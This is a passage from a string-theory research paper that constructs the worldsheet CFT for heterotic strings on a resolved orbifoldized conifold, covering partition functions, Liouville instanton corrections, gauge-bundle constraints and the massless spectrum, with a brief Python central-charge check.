The term between the brackets corresponds to a linear dilaton $\rho$ with background charge $\mathcal{Q}=\tfrac{1}{\ell}$, together with a $U(1)$ at level $2\ell^2$ (associated with the bosonic field $X_\textsc{l}$) and a Weyl fermion. This system has $\mathcal{N}=(2,0)$ supersymmetry, as it can be viewed as the holomorphic part of $\mathcal{N}=2$ Liouville theory at zero coupling. The last two factors are $SU(2)/U(1)$ super-cosets which are $\mathcal{N}=2$ minimal models. One then concludes that the left-moving part of the \textsc{cft} has an $\mathcal{N}=2$
superconformal symmetry. The associated R-current reads~:
\begin{equation}
J_R (z) = i \psi^\rho \psi^\textsc{x} +\sqrt{\frac{2}{\alpha'}} \frac{i\partial X_\textsc{l}}{\ell} + i \zeta^1 \zeta^2-\frac{J^3_1}{2\ell^2} +
i \zeta^3 \zeta^4-\frac{J^3_2}{2\ell^2} \, .
\end{equation}
One observes from the partition function~(\ref{conepf}) that the $U(1)$ charge under the holomorphic current
$i\sqrt{2/\alpha'} \partial X_\textsc{l}/\ell$, given by the argument
of the theta-function at level $2\ell^2$, is always such that the total R-charge is an integer of definite parity. Therefore, with the usual
fermionic \textsc{gso} projection, this theory preserves $\mathcal{N}=1$ supersymmetry in four dimensions {\it \`a la} Gepner~\cite{Gepner:1987qi}.
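A simple consistency check of this decomposition is that the left-moving internal central charge adds up to $c=9$, as required for criticality: with $k'=2\ell^2$ and $k=4\ell^2$ one has $c = \left(3+\tfrac{6}{k'}\right) + 2\left(3-\tfrac{6}{k}\right) = 9 + \tfrac{3}{\ell^2} - \tfrac{3}{\ell^2} = 9$, independently of $\ell$. An illustrative Python sketch of this bookkeeping (assuming the standard central charges of $\mathcal{N}=2$ Liouville theory and minimal models):

```python
from fractions import Fraction

# Assumed standard values: N=2 Liouville at level k' has c = 3 + 6/k';
# the N=2 minimal model SU(2)_k/U(1) has c = 3 - 6/k.
def internal_central_charge(l):
    k, kp = 4 * l * l, 2 * l * l          # k = 4 l^2 and k' = k/2
    c_liouville = 3 + Fraction(6, kp)     # [R_{1/l} x U(1)_{2 l^2}] + fermion
    c_minimal = 3 - Fraction(6, k)        # one SU(2)_k/U(1) super-coset
    return c_liouville + 2 * c_minimal

# c = 9 for every l, as required for a critical heterotic background
assert all(internal_central_charge(l) == 9 for l in range(2, 10))
```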
\subsection{Orbifold of the conifold}
\label{orb-sec}
The worldsheet \textsc{cft} discussed in sections \ref{sec:acft} and \ref{sec:hetstr}, as it stands, defines a singular heterotic string background, at least at large $\rho$ where the string coupling constant is small. In addition, one is free to take an orbifold of the $T^{1,1}$ base in a way that preserves $\mathcal{N}=1$ supersymmetry. If one resolves the singularity with a four-cycle, a $\mathbb{Z}_2$ orbifold is actually needed. From the supergravity point of view, this removes the conical singularity at the bolt, while from the \textsc{cft} perspective, the presence of the orbifold is related to worldsheet non-perturbative effects, as will be discussed below.
Among the possible supersymmetric orbifolds of the conifold, we consider here a half-period shift along the $S^1$ fiber of the $T^{1,1}$ base~:
\begin{equation}
\mathcal{T}\, : \ \psi \sim \psi +2 \pi\,,
\end{equation}
which amounts to a shift orbifold in the lattice of the chiral $U(1)$ at level $\vec{p}^{\,2}/2$. As the coordinate $\psi$ on the fiber is identified with the corresponding coordinates on the Hopf fibers of the two three-spheres, {\it i.e.} $\psi/2=\psi_1=\psi_2$, the modular-invariant action of the orbifold can be conveniently derived by orbifoldizing on the left one of the two $SU(2)$ \textsc{wzw} models along the Hopf fiber (which gives the $\mathcal{N}=(1,0)$ worldsheet \textsc{cft} for a Lens space), {\it before} performing the gauging~(\ref{gaugingI}). This orbifold is consistent provided $k$ is even, which is clearly satisfied for the choice $\vec{p}=(2\ell,0^{15})$ we have made so far. The coset \textsc{cft} constructed from this orbifold theory will then automatically yield a modular-invariant orbifold of the $T^{1,1}$ \textsc{cft}.
The partition function for the singular orbifoldized conifold is derived as follows. We first perform in the partition function~(\ref{conepf}) the substitution
\begin{equation}
C^{j_2}_{m_1-2\ell(2M+u)} \oao{a}{b} \
\to \ \frac{1}{2}\sum_{\gamma,\delta \in \mathbb{Z}_2} e^{i\pi \delta(m_1 + 2\ell^2 \gamma)}\,
C^{j_2}_{m_1+4\ell^2 \gamma-2\ell(2M+u)} \oao{a}{b} \,,
\end{equation}
which takes into account the geometrical action of the orbifold. As expected, the
orbifold projection, given by the sum over $\delta$, constrains the momentum along the fiber to be even, both
in the untwisted sector ($\gamma=0$) and
in the twisted sector ($\gamma=1$). Using the reflection symmetry~(\ref{reflsym}), this expression is equivalent to
\begin{equation}
\frac{1}{2}\sum_{\gamma,\delta \in \mathbb{Z}_2} e^{i\pi \delta(2j_2 + (2\ell^2-1) \gamma)} \,
C^{j_2+ \gamma(k/2-2j_2-1)}_{m_1-2\ell(2M+u)} \oao{a}{b} \,(-)^{\delta a +\gamma b +\gamma \delta}\, .
\label{orbchar}
\end{equation}
The phase factor $(-)^{\delta a +\gamma b +\gamma \delta}$ gives the action of a $(-)^{F_{\textsc{l}}}$
orbifold, $F_{\textsc{l}}$ denoting the left-moving space-time fermion number. The orbifold by itself is therefore not supersymmetric,
as space-time supercharges are constructed out of $SU(2)/U(1)$ primaries with $j_1=j_2=0$ in the \textsc{r} sector ($a=1$).
To obtain a supersymmetric orbifold, one needs to supplement this identification with
a $(-)^{F_{\textsc{l}}}$ action offsetting this projection. We will therefore instead quotient by $\mathcal{T} (-)^{F_{\textsc{l}}}$, which preserves space-time supersymmetry.
The last point to consider is the possible action of the orbifold on the $Spin (32)/\mathbb{Z}_2$ lattice. A specific constraint must be satisfied here, which will guide us in selecting the right involution among the possible ones. From the form of the orbifold projection in expression~(\ref{orbchar}) one notices that in the twisted sector ($\gamma=1$) the $SU(2)$ spin $j_2$ needs to be half-integer. As we will discuss below, if we consider the worldsheet \textsc{cft} for the resolved conifold,
this leads to an inconsistency due to worldsheet non-perturbative effects. Note that this
problem is only due to the particular choice of shift vectors $\vec{p}$ of the form~(\ref{minimalsol}) satisfying $\vec{p}^{\, 2}\equiv 0 \mod 4$, rather than $\vec{p}^{\,2}\equiv 2 \mod 4$ which is more natural in supergravity.\footnote{This choice was made for convenience, as it involves the minimal number of right-moving fermions. One
can check that all coset models with $\vec{p}^{\,2}\equiv 2 \mod 4$ involve a larger number of right-moving worldsheet fermions. In such cases, one cannot obtain a partition function explicitly written in terms of standard fermionic characters (although the \textsc{cft} is of course well-defined).}
However, as one would guess, the situation is not hopeless. In this example, as in other models with $\vec{p}^{\, 2}\equiv 0 \mod 4$, one way to obtain the correct projection in the twisted sector is to supplement the $\mathbb{Z}_2$ geometrical action with a $(-)^{\bar S}$ projection in the $Spin(32)/\mathbb{Z}_2$ lattice, defined such that spinorial representations of $Spin(32)$ are odd.\footnote{It has a similar effect as the $(-)^{F_{\textsc{l}}}$ projection on the left-movers.} This has the effect of adding an extra monodromy
for the gauge bundle, around the orbifold singularity. Overall one mods out the conifold \textsc{cft} by the $\mathbb{Z}_2$ symmetry
\begin{equation}
\mathcal{R} = \mathcal{T} (-)^{F_\textsc{l}+\bar S}\, .
\label{orbdef}
\end{equation}
Combining the space-time orbifold as described in eq.~(\ref{orbchar}) with the $(-)^{\bar S}$ action, one obtains a \textsc{cft} for the orbifoldized conifold,
such that states in the left \textsc{ns} sector have integer $SU(2)\times SU(2)$ spins in the orbifold twisted sector. The full partition
function of this theory reads:
\begin{multline}
\label{orbconepf}
Z (\tau, \bar \tau) =\frac{1}{(4\pi \tau_2 \alpha')^{5/2}} \frac{1}{\eta^3 \bar \eta^3} \,
\frac{1}{2}\sum_{a,b}(-)^{a+b} \frac{\vartheta \oao{a}{b}^2}{\eta^2}
\sum_{2j_1,2j_2=0}^{k-2} \sum_{m_1 \in \mathbb{Z}_{2k}}C^{j_1}_{m_1} \oao{a}{b}\, \frac{1}{2}\sum_{u,v \in \mathbb{Z}_2}
\frac{\bar{\vartheta} \oao{u}{v}^{15}}{\bar{\eta}^{15}}
\, \times \\[4pt]
\times \,
\frac{1}{2}\sum_{\gamma,\delta \in \mathbb{Z}_2} (-)^{\delta(2j_2 + 2\ell^2 \gamma+u) +v\gamma}
\sum_{M \in \mathbb{Z}_{2\ell}}C^{j_2+ \gamma(k/2-2j_2-1)}_{m_1-2\ell(2M+u)} \oao{a}{b} e^{i\pi v (M+\tfrac{u}{2})}
\frac{\Theta_{m_1-2\ell(M+u/2),2\ell^2}}{\eta}\, \bar{\chi}^{j_1} \bar{\chi}^{j_2} \,.
\end{multline}
To conclude, we stress that if one chooses a gauge bundle with $\vec{p}^{\, 2}\equiv 2 \mod 4$, no orbifold action on the gauge bundle is needed in order
to obtain a consistent worldsheet \textsc{cft} for the resolved orbifoldized conifold.
\subsection{Worldsheet \textsc{cft} for the resolved orbifoldized conifold}
In this section, we move on to construct the worldsheet \textsc{cft} underlying the resolved orbifoldized conifold with torsion~(\ref{sol-nhl}), which possesses a non-vanishing four-cycle at the tip of the cone. As a reminder, this theory
is defined by both gaugings~(\ref{gaugingI},\ref{gaugingII}), where the second one now also involves an $SL(2,\mathbb{R})$ $\mathcal{N}=(1,0)$ \textsc{wzw} model at level $k/2$ and comprises an action on the $Spin(32)/\mathbb{Z}_2$ lattice parametrized by the vector $\vec{q}$.
Denoting by $K^3$ the left-moving total affine current corresponding to the elliptic Cartan of $\mathfrak{sl}(2,\mathbb{R})$ and by $\bar{k}^3$ the right-moving purely bosonic one, the gauging leads to two constraints on their zero modes~:
\begin{equation}
K^3_0 = \frac{\sqrt{\alpha ' k'}}{2} p_\textsc{x} \, , \qquad\qquad 2\bar{k}^3_0 = -\vec{q} \cdot \vec{Q}_\textsc{f}\,,
\label{sl2constr}
\end{equation}
where $p_\textsc{x}$ is the momentum of the chiral boson $X_\textsc{l}$.
As for the first gauging, these constraints can be solved by decomposing the $SL(2,\mathbb{R})$ characters in terms of the (parafermionic) characters of the coset $SL(2,\mathbb{R})/U(1)$ and of the time-like $U(1)$ which is gauged.
We consider from now on the model obtained for the choice of shift vectors $\vec{p}$ and $\vec{q}$ given by eq.~(\ref{minimalsol}), minimally solving the anomaly cancellation conditions~(\ref{anomalyconstrI},\ref{anomalyconstrII}). This choice also implies that the $SL(2,\mathbb{R})$ part of the gauged \textsc{wzw} model will be the same as for an $\mathcal{N}=(1,1)$ model (as the third entry of $\vec{q}$
corresponds to the worldsheet-supersymmetric coupling of fermions to the gauged \textsc{wzw} model). The supersymmetric
level of $SL(2,\mathbb{R})$ in this example is $k'=2\ell^2$. Conveniently, one can then use the characters of the super-coset both
for the left- and right-movers.\footnote{These characters, identical to the ones of $\mathcal{N}=2$ Liouville theory, are described in appendix~\ref{appchar}.}
Then, the second entry of the shift vector $\vec{q}$~(\ref{minimalsol}) corresponds to the minimal coupling of the gauge field to an extra right-moving Weyl fermion of charge $\ell$.
Solving the constraints~(\ref{sl2constr}), one obtains the partition function for $Spin(32)/\mathbb{Z}_2$ heterotic strings on the resolved orbifoldized conifold with torsion. The first contribution comes
from continuous representations of $SL(2,\mathbb{R})$ spin $J=\tfrac{1}{2} + iP$, whose wave-functions are delta-function normalizable. It reads
\begin{multline}
\label{resolvedcontpf}
Z_c (\tau ,\bar \tau) =\, \frac{1}{(4\pi \tau_2 \alpha')^{2}} \frac{1}{\eta^2 \bar \eta^2}
\frac{1}{2}\sum_{a,b}(-)^{a+b} \frac{\vartheta \oao{a}{b}}{\eta}
\sum_{2j_1,2j_2=0}^{4\ell^2-2} \, \sum_{m_1 \in \mathbb{Z}_{8\ell^2}}\, C^{j_1}_{m_1} \oao{a}{b} \, \\
\times
\frac{1}{2}\!\!\sum_{u,v \in \mathbb{Z}_2}
\frac{1}{2}\!\sum_{\gamma,\delta \in \mathbb{Z}_2} (-)^{\delta(2j_2 + 2\ell^2 \gamma+u) +v\gamma}
\!\!\!\sum_{M,N \in \mathbb{Z}_{2\ell}}\!\! \!(-)^{ v (M+N+u)} C^{j_2+ \gamma(k/2-2j_2-1)}_{m_1-2\ell(2M+u)} \oao{a}{b}
\bar{\chi}^{j_1} \bar{\chi}^{j_2} \frac{\bar{\vartheta} \oao{u}{v}^{13}}{\bar{\eta}^{13}}\\[4pt]
\times \frac{4}{\sqrt{\alpha' k}} \int_0^\infty\! \mathrm{d} P \,
Ch_c \oao{a}{b}\left(\tfrac{1}{2}+iP, \tfrac{m_1}{2}-\ell(M+\tfrac{u}{2});\, \tau\right) \,
Ch_c \oao{u}{v} \left(\tfrac{1}{2}+iP,\ell(N+\tfrac{u}{2});\, \bar{\tau}\right)\,.
\end{multline}
By using the explicit expression for the characters $Ch_c \oao{a}{b} (\tfrac{1}{2}+iP,n)$ of the continuous representations of $SL(2,\mathbb{R})$ (see eq.~(\ref{extcontchar})), one can show that
this contribution to the partition function is actually
identical to the partition function~(\ref{orbconepf}) for the orbifoldized singular conifold.
This is not surprising, as the one-loop amplitude (\ref{resolvedcontpf}) captures the modes that are not localized close to the singularity and
hence are not sensitive to its resolution.\footnote{The effect of the resolution can however be observed in the sub-dominant term of the density of continuous representations, which does not scale
with the infinite volume of the target space and is related to the reflection amplitude induced by the Liouville potential discussed below, see~\cite{Maldacena:2000kv,Israel:2004ir}.}
More interestingly, {\it discrete representations} appear in the spectrum, labelled by their $SL(2,\mathbb{R})$ spin $J>0$. They correspond to states whose wave-function is localized near the resolved singularity, {\it i.e.} for $r\sim a$. Their contribution to the partition function is as follows:
\begin{multline}
\label{resolveddiscpf}
Z_d (\tau ,\bar \tau) =\, \frac{1}{(4\pi \tau_2 \alpha')^{2}} \frac{1}{\eta^2 \bar \eta^2}
\frac{1}{2}\sum_{a,b}(-)^{a+b} \frac{\vartheta \oao{a}{b}}{\eta}
\sum_{2j_1,2j_2=0}^{4\ell^2-2} \, \sum_{m_1 \in \mathbb{Z}_{8\ell^2}}\, C^{j_1}_{m_1} \oao{a}{b} \, \\ \times
\frac{1}{2}\!\sum_{u,v \in \mathbb{Z}_2}
\frac{1}{2}\!\sum_{\gamma,\delta \in \mathbb{Z}_2} (-)^{\delta(2j_2 + 2\ell^2 \gamma+u) +v\gamma}
\!\!\!\sum_{M,N \in \mathbb{Z}_{2\ell}}\!\! (-)^{ v (M+N+u)} C^{j_2+ \gamma(k/2-2j_2-1)}_{m_1-2\ell(2M+u)} \oao{a}{b}
\bar{\chi}^{j_1} \bar{\chi}^{j_2} \frac{\bar{\vartheta} \oao{u}{v}^{13}}{\bar{\eta}^{13}}\\ \times\sum_{2J=2}^{2\ell^2+2}
Ch_d \oao{a}{b}\left(J, \tfrac{m_1}{2}-\ell(M+\tfrac{u}{2})-J-\tfrac{a}{2};\, \tau\right) \,
Ch_d \oao{u}{v} \left(J, \ell(N+\tfrac{u}{2})-J-\tfrac{u}{2};\, \bar{\tau}\right) \\ \times \
\delta^{[2]}_{m_1-\ell(2M+u)-a , 2J}\ \delta^{[2]}_{\ell(2N+u)-u, 2J}\,,
\end{multline}
where the mod-two Kronecker symbols ensure that relation~(\ref{Rchargecoset}) holds. These discrete states break part of the gauge symmetry which was left unbroken by the first gauging.
As can be checked from the partition function~(\ref{resolveddiscpf}), the resolution of the singularity preserves $\mathcal{N}=1$ space-time supersymmetry. Indeed, the left-moving part of the one-loop amplitude consists of a tensor product of $\mathcal{N}=2$ superconformal theories
(the $SL(2,\mathbb{R})/U(1)$ and two copies of $SU(2)/U(1)$ super-cosets) whose worldsheet R-charges add up to integer values of definite parity.
Getting the explicit partition function for generic shift vectors $\vec{p}$ and $\vec{q}$ is not conceptually more difficult, but technically more involved.
One needs to introduce the string functions associated with the coset \textsc{cft} $[Spin(32)/\mathbb{Z}_2]/[U(1)\times U(1)]$, where the embeddings of the two gauged affine $U(1)$ factors are specified by
$\vec{p}$ and $\vec{q}$. In the fermionic representation, this amounts to repeated use of
product formulas for theta-functions. The actual form of the results will clearly depend on the arithmetical properties of the shift vectors' entries.
\subsection{Worldsheet non-perturbative effects}\label{wnpe}
The existence of a worldsheet \textsc{cft} description for the heterotic resolved conifold background gives us in addition a handle on worldsheet instanton effects. As for the warped Eguchi-Hanson background analyzed in~\cite{Carlevaro:2008qf}, at least part of these effects are captured by worldsheet non-perturbative corrections to the $SL(2,\mathbb{R})/U(1)$ super-coset part of the \textsc{cft}. In the present context, these corrections should correspond to string worldsheets wrapping the $\mathbb{C}P^1$'s of the blown-up four-cycle.
It is actually known~\cite{fzz,Kazakov:2000pm,Hori:2001ax} that the $SL(2,\mathbb{R})/U(1)$ coset receives non-perturbative
corrections in the form of a sine-Liouville potential (or an $\mathcal{N}=2$ Liouville
potential in the supersymmetric case). Thus, to ensure that the worldsheet \textsc{cft} is
non-perturbatively consistent, one needs to check whether the operator corresponding to this
potential, in its appropriate form, is part of the physical spectrum of the theory. Whenever this is not the case, the resolution of the conifold singularity with a four-cycle is not possible.
The marginal deformation corresponding to this Liouville potential can be written in an asymptotic free-field description, valid in the large-$\rho$ region far from the bolt, where $\rho$ can be viewed as a linear dilaton direction, as for the singular conifold theory.
Let us begin with the specific choice of gauge bundle corresponding to the model~(\ref{resolvedcontpf}).
The appropriate Liouville-type interaction reads in this case (using the bosonic representation of the Cartan generators in~(\ref{cartanbosfer})):\footnote{We set here $\alpha'=2$ for convenience. The bosonic fields $X$, $Y^i$ and $\rho$, as well
as the fermionic superpartners, are all canonically normalized.}
\begin{equation}
\label{Liouvint}
\delta S = \mu_\textsc{l} \int \mathrm{d}^2 z \, (\psi^\rho +i\psi^\textsc{x})(\bar{\xi}^5+i\bar{\xi}^6) e^{-\ell(\rho + iX_\textsc{l}+iY^2_\textsc{r})}
+ c.c.\,.
\end{equation}
Note that the contribution of the $SU(2)/U(1)$ coset is trivial. One now requires the operator appearing in the deformation (\ref{Liouvint}) to be part of the
physical spectrum, at super-ghost number zero. If so, it can be used to de-singularize the
background.
We proceed to determine the quantum numbers of this operator to be able to identify its contribution in the partition function~(\ref{orbconepf}). Let us begin by looking at the holomorphic
part. We denote by $p_\textsc{x} = -\ell$ the momentum of the compact boson $X_\textsc{l}$. From the partition function for the singular conifold~(\ref{orbconepf}), a state with such momentum for $X_\textsc{l}$ obeys the condition
\begin{equation}
m_1-\ell(2M+u) \equiv -2\ell^2 \mod 4\ell^2\,.
\end{equation}
For this operator to be in the right-moving \textsc{ns} sector we require $u=0$. Secondly we want the contributions of both
$SU(2)/U(1)$ super-cosets to be isomorphic to the identity. The solution to these constraints is given by\footnote{Note
that the two $SU(2)/U(1)$ cosets seem naively to play inequivalent roles; this simply comes
from the fact that we are solving the coset constraint~(\ref{zeroconstr}) in a way that is not explicitly invariant under permutation of the
two cosets.}
\begin{equation}
m_1=0 \quad , \qquad M = \ell\,.
\end{equation}
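Indeed, with $u=0$ this choice satisfies the momentum condition derived above, as
\begin{equation}
m_1-\ell(2M+u) = 0 - 2\ell^2 = -2\ell^2 \,.
\end{equation}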
In order to obtain the identity operator, one selects the
representations $j_1=0$ and $j_2=0$ respectively. The reflection symmetry~(\ref{reflsym}) maps the contribution of the second $SU(2)/U(1)$ super-coset
--~which belongs to the twisted sector of the $\mathbb{Z}_2$ orbifold~(\ref{orbdef})~-- to the identity.
This property also ensures that the Liouville potential in~(\ref{Liouvint}) is even under the left-moving \textsc{gso} projection.\footnote{Indeed, as a $(-)^b$ factor appears in the right-hand side of the identity~(\ref{reflsym}), the left \textsc{gso} projection is reversed.}
On the right-moving side, one first needs to choose the momentum of $Y_\textsc{r}^2$ to be
$\bar{p}_\textsc{y} = -\ell$. This implies that the state under consideration has $N=-\ell$ in the partition function~(\ref{orbconepf}). Secondly, having $j_1=j_2=0$ ensures that the right $SU(2)_k\times SU(2)_k$ contribution is trivial. This would not have been possible without the $\mathbb{Z}_2$ orbifold. This shows that, as in~\cite{Carlevaro:2008qf},
the presence of the orbifold is dictated by the non-perturbative consistency of the worldsheet \textsc{cft}. This illustrates in a remarkable way how the condition in supergravity guaranteeing
the absence of a conical singularity at the bolt manifests itself in a fully stringy description.
A last possible obstruction to the presence of the Liouville potential (\ref{Liouvint}) in the spectrum
comes from the right-moving \textsc{gso} projection, defined in the fermionic representation of the
$Spin (32)/\mathbb{Z}_2$ lattice, given in~(\ref{orbconepf}) by the sum over $v$. Now, the
right worldsheet fermion number of the Liouville potential~(\ref{Liouvint}) is given by
\begin{equation}
\bar{F}= \ell +1 \mod 2\,,
\end{equation}
and, in addition, the right-moving \textsc{gso} projection receives a contribution related to the momentum $p_\textsc{x}$, which can be traced back to the coset producing the $T^{1,1}$ base of the conifold (see the phase $(-)^{vM}$ in the partition function~(\ref{orbconepf}) of our model).
As we are in the twisted sector of the $\mathbb{Z}_2$ orbifold, the
heterotic \textsc{gso} projection is reversed (because of the $(-)^{v\gamma}$ factor). Overall, the right \textsc{gso} parity of the Liouville
operator~(\ref{Liouvint})
is then $2\ell \mod 2$. Therefore the Liouville potential~(\ref{Liouvint}) is part of the physical spectrum for any $\ell$.
In the \textsc{cft} for the resolved conifold, the operator corresponding to the Liouville potential belongs to the discrete representation of $SL(2,\mathbb{R})$ of spin
$J=\ell^2$. One can check from the partition function of the discrete states~(\ref{resolveddiscpf}) that it is indeed physical. This operator
is also chiral w.r.t. both the left and right $\mathcal{N}=2$ superconformal algebras of $SL(2,\mathbb{R})/U(1)\times SU(2)/U(1) \times SU(2)/U(1)$.
\subsubsection*{Non-perturbative corrections for generic bundles}
This analysis can be extended to a generic Abelian gauge bundle over the resolved conifold,
{\it i.e.} for an arbitrary shift vector $\vec{q}$ leading to
a consistent gauged \textsc{wzw} model. One can write the necessary Liouville potential in a free-field description as
\begin{equation}
\label{Liouvintgen}
\delta S = \mu_\textsc{l} \int \mathrm{d}^2 z (\psi^\rho +i\psi^\textsc{x})e^{-\frac{\sqrt{\vec{q}^{\,2}-4}}{2} (\rho + i X_\textsc{l})}
\, e^{\frac{i}{2}\vec{q} \cdot \vec{Y}_\textsc{r}}
+ c.c. \,.
\end{equation}
Again we require this operator to be part of the physical spectrum of the heterotic coset \textsc{cft} (\ref{cosetdef}),
taking into account the \textsc{gso} and orbifold projections.
We have to discuss two cases separately:\\
\noindent $\bullet$ {\it Bundles with} $c_1(V) \in H^2 (\mathcal{M}_6,2\mathbb{Z})$\\[4pt]
Let us first start by looking at bundles with $\vec{p}^{\, 2}\equiv 2 \mod 4$, for which the orbifold allows the Liouville operator to
be in the spectrum without any action in the $Spin(32)/\mathbb{Z}_2$ lattice (see the discussion in subsection~\ref{orb-sec}).
On top of the parity under the orbifold projection, one also needs to check that the right \textsc{gso} projection is satisfied.
The right worldsheet fermion number of this operator is given by
\begin{equation}
\bar{F}= \frac{1}{2}\sum_{i=1}^{16} q_i\, .
\end{equation}
As for the particular example above, the right \textsc{gso} projection also receives a contribution from the $X_\textsc{l}$ momentum.
The generalization of the $(-)^{v\ell}$ phase found there to a generic Abelian bundle can be shown to be:
\begin{equation}
e^{ \frac{i \pi }{2} v \sum\limits_{i=1}^{16} p_i}\, .
\end{equation}
Therefore, one concludes that the gauge bundle associated with the resolution of the conifold needs to satisfy the constraint
\begin{equation}
\frac{1}{2}\sum_{i=1}^{16} (q_i - p_i) \equiv 0 \mod 2 \,.
\label{fwcondcft}
\end{equation}
We observe (as for the warped Eguchi-Hanson heterotic \textsc{cft}, see~\cite{Carlevaro:2008qf}) that this condition is similar to one of the two conditions given by eq.~(\ref{Kth2}). Considering only bundles with vector structure, the constraints~(\ref{fwcondcft})
and~(\ref{Kth2}) are just the same. If we choose instead a bundle without vector structure, the entries of $\vec{q}$ are all
odd integers, see~(\ref{constr-pandq}). Therefore the condition of right \textsc{gso} invariance of the complex conjugate Liouville operator actually reproduces
the second constraint of eq.~(\ref{Kth2}).
To make a long story short, this means that, in all cases, requiring the existence of a Liouville operator invariant under the right \textsc{gso} projection in the physical spectrum is equivalent to the condition~(\ref{Kth}) on the first Chern class of the gauge bundle, {\it i.e.} that $c_1 (V) \in H^2(\mathcal{M}_6,2\mathbb{Z})$. This remarkable
relation between topological properties of the gauge bundle and the \textsc{gso} parity of worldsheet instanton corrections may
originate from modular invariance, which relates the existence of spinorial representations of the gauge group to the projection with the right-moving worldsheet fermion number.\\
\noindent $\bullet$
{\it Bundles with} $c_1(V) \in H^2 (\mathcal{M}_6,2\mathbb{Z}+1)$\\[4pt]
We now consider bundles with $\vec{p}^{\, 2}\equiv 0 \mod 4$, for which an orbifold action in the $Spin(32)/\mathbb{Z}_2$ lattice is necessary for the Liouville operator to be part of the physical spectrum. The $(-)^{\bar{S}}$ action in the orbifold has the effect of reversing the \textsc{gso} projection in the twisted sector. Hence we obtain the condition
\begin{equation}
\frac{1}{2}\sum_{i=1}^{16} (q_i - p_i) \equiv 1 \mod 2\,,
\label{fwcond}
\end{equation}
which now entails $c_1 (V) \in H^2(\mathcal{M}_6,2\mathbb{Z}+1)$. This condition on the first Chern class is the opposite (in evenness) to the standard condition on $c_1(V)$ appearing in the previous case~(\ref{fwcondcft}); this fact can be traced back to the extra monodromy
of the gauge bundle around the resolved orbifold singularity.
\subsection{Massless spectrum}
In this section, we study in detail the massless spectrum of the resolved heterotic conifold with torsion. As in~\cite{Carlevaro:2008qf}, the gauge bosons
corresponding to the unbroken gauge symmetry are non-normalizable, hence do not have support near the resolved singularity. In contrast, the spectrum
of normalizable, massless states consists of chiral multiplets of $\mathcal{N}=1$ supersymmetry in four dimensions.
As all the states in the right Ramond sector are massive, we restrict ourselves to the \textsc{ns} sector ($u=0$). In this case the orbifold projection
enforces $j_2 \in \mathbb{Z}$. One first looks for chiral operators w.r.t. the left-moving $\mathcal{N}=2$ superconformal algebra of the
coset~(\ref{cosetdef}) of worldsheet R-charge $Q_R = \pm 1$.\footnote{Note that states with $Q_R=0$ in the conifold \textsc{cft} cannot give
massless states, as the identity operator is not normalizable in the $SL(2,\mathbb{R})/U(1)$ \textsc{cft}.}
Then, one must pair them with a right-moving part of conformal dimension $\bar \Delta = 1$.
In the special case studied here, which also comprises a right $\mathcal{N}=2$ superconformal algebra for the $SL(2,\mathbb{R})/U(1)$ factor, one can start with right chiral primaries
of $SL(2,\mathbb{R})/U(1)$, tensored with conformal primaries of the bosonic $SU(2)_{k-2} \times SU(2)_{k-2}$, which
overall yields a state of dimension $\bar \Delta=1/2$.
A physical state of dimension one can then be constructed either by:
\begin{itemize}
\item adding a fermionic oscillator $\bar{\xi}^a_{-1/2}$ from the free $SO(26)_1$ gauge sector. This gives a state in the fundamental representation of $SO(26)$.
\item taking the right superconformal descendant of the $(1/2,1/2)$ state using the global
right-moving superconformal algebra of the $SL(2,\mathbb{R})/U(1)$ coset ({\it i.e.} acting with $\bar{G}_{-1/2}$). This leads to a singlet of $SO(26)$.
\end{itemize}
In both cases, one needs to check, using the discrete part of the partition function~(\ref{resolveddiscpf}), that such physical states actually exist.
The $U(1)$ symmetry generating translations along the $S^1$ fiber of $T^{1,1}$ (of coordinate $\psi$) corresponds to an R-symmetry in space-time
(of four-dimensional $\mathcal{N}=1$ supersymmetry). In the worldsheet \textsc{cft} for the singular conifold, the associated affine $U(1)$ symmetry is realized in terms of the chiral boson
$X_\textsc{l}$. Therefore the R-charge $R$ in space-time is given by the argument of the theta-function at level $\vec{p}^{\, 2}/2$ (see the partition function~(\ref{orbconepf})).\footnote{In order to correctly
normalize the space-time R-symmetry charges, one needs to ensure that the space-time supercharges have R-charges $\pm 1$. The latter are constructed from vertex operators in the Ramond sector ($a=1$), with $j_1=j_2=0$, $m_1 = \pm 1$ and $M=0$.} In the resolved geometry it is
broken to a $\mathbb{Z}_{\vec{q}^2/2-2}$ discrete subgroup by the Liouville potential~(\ref{Liouvintgen}).
\subsubsection*{Untwisted sector}
Let us begin by discussing the untwisted sector. On the left-moving side, one can first consider states of the
$(a,a,a)$ type, $i.e.$ antichiral w.r.t. the $\mathcal{N}=2$ superconformal
algebras of the $SL(2,\mathbb{R})/U(1)$ and the two $SU(2)/U(1)$ super-cosets. For properties of these chiral primaries we refer the reader to appendix~\ref{appchar}. States of this type have conformal dimension one-half provided the $SL(2,\mathbb{R})$ spin obeys
\begin{equation}
J=1+\frac{j_1+j_2}{2}\,.
\end{equation}
The conditions relating the R-charges of the three coset theories, as can be read from the partition function~(\ref{resolveddiscpf}), imply that:\footnote{
These three equations correspond respectively to the $SL(2,\mathbb{R})/U(1)$ factor, to the first $SU(2)/U(1)$ super-coset, with spin $j_1$ and to the second one, with spin $j_2$.}
\begin{equation}
\left\{ \begin{array}{lcl} m_1 -2\ell M &=&2(J-1)\, =\, j_1 + j_2 \\[4pt]
m_1 & =& 2j_1\\[4pt]
m_1-4\ell M & =& 2j_2
\end{array}
\right. \implies j_1 - j_2 \,=\, 2\ell M \,.
\end{equation}
Then, one can first tensor states of this kind with right chiral primaries of $SL(2,\mathbb{R})/U(1)$ (denoted $\bar{c}$). The conformal primary
obtained by adding the $SU(2)_{k-2} \times SU(2)_{k-2}$ contribution has the required dimension
$\bar \Delta = 1/2$, provided that
\begin{equation}
(j_1+1)^2 + (j_2+1)^2 = 2 \ell^2 \, ,
\end{equation}
and the R-charge of $SL(2,\mathbb{R})/U(1)$ is such that $j_1+j_2+2 = 2\ell N$.
There exists a single solution to all these constraints for $N=1$ and $M=0$, leading to a
$(a,a,a)_\textsc{u} \otimes \bar{c}$ state with $J=\ell$ and $j_1=j_2=\ell-1$. Starting instead with a right anti-chiral primary
of $SL(2,\mathbb{R})/U(1)$ (denoted $\bar{a}$), we arrive at the two constraints
\begin{equation}
\left\{ \begin{array}{lcl} j_1^2 + j_2^2 &=& 0\\[4pt]
j_1+j_2 &=& 2\ell N
\end{array}
\right. \, ,
\end{equation}
which can simultaneously be solved by setting $J=1$ and $j_1=j_2=0$.
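As a consistency check, the $(a,a,a)_\textsc{u} \otimes \bar{c}$ solution with $j_1=j_2=\ell-1$ and $N=1$ indeed satisfies
\begin{equation}
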